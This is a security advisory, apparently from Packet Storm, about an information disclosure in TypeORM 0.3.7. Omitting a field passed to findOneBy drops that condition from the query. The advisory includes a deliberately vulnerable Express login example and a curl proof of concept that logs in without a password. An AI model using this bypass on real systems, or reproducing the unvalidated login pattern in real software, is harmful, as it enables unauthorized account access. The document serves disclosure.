

TypeORM 0.3.7 Information Disclosure

TypeORM version 0.3.7 suffers from an information disclosure vulnerability.

Packet Storm
I found what I think is a vulnerability in the latest typeorm 0.3.7.TypeORM v0.3 has a new findOneBy method instead of findOneById() and it isthe only way to get a record by idSending undefined as a value in this method removes this parameter from thequery. This leads to the data exposure.For example:Users.findOneBy({id:}) with /?id=12345 produces SELECT * FROMUsers WHERE id=12345 LIMIT 1 while removing id from the query stringproduces SELECT * FROM Users LIMIT 1Maintainer also does not consider this a vulnerability and stated theroot cause is bad input validation. I tried to contact Snyk, but theytook the author's position. I still think it is a major vulnerabilityVulnerable app:import {  Entity,  PrimaryGeneratedColumn,  Column,  Connection,  ConnectionOptions,  Repository,  createConnection} from 'typeorm';import express from 'express';import {Application, Request, Response} from 'express';let connection: Connection;async function myListener(request: Request, response: Response) {  if(!connection)    connection = await createConnection(connectionOpts);  const userRepo: Repository<User> = connection.getRepository(User);  const { email, password }: Record<string, string> = request.body;  const user = await userRepo.findOneBy({ email, password });  return response.json(user ? 'ok' : 'denied');}@Entity({ name: 'Users' })class User {    @PrimaryGeneratedColumn()    id!: number;    @Column()    email!: string;    @Column()    password!: string;}const connectionOpts: ConnectionOptions = {  type: 'mysql',  name: 'myconnection',  host: 'localhost',  username: 'root',  password: 'test123',  database: 'domurl',  entities: [User]}const app: Application = express();app.use(express.json()); "/authenticate", myListener);app.listen(4444, () => console.log('App started'));Usage:curl -H 'Content-Type:application/json' --data '{"email": "[email protected]", "password":"incorrect"}'"denied"⏎Exploit:curl -H 'Content-Type:application/json' --data '{"email": "[email protected]"}'"ok"⏎

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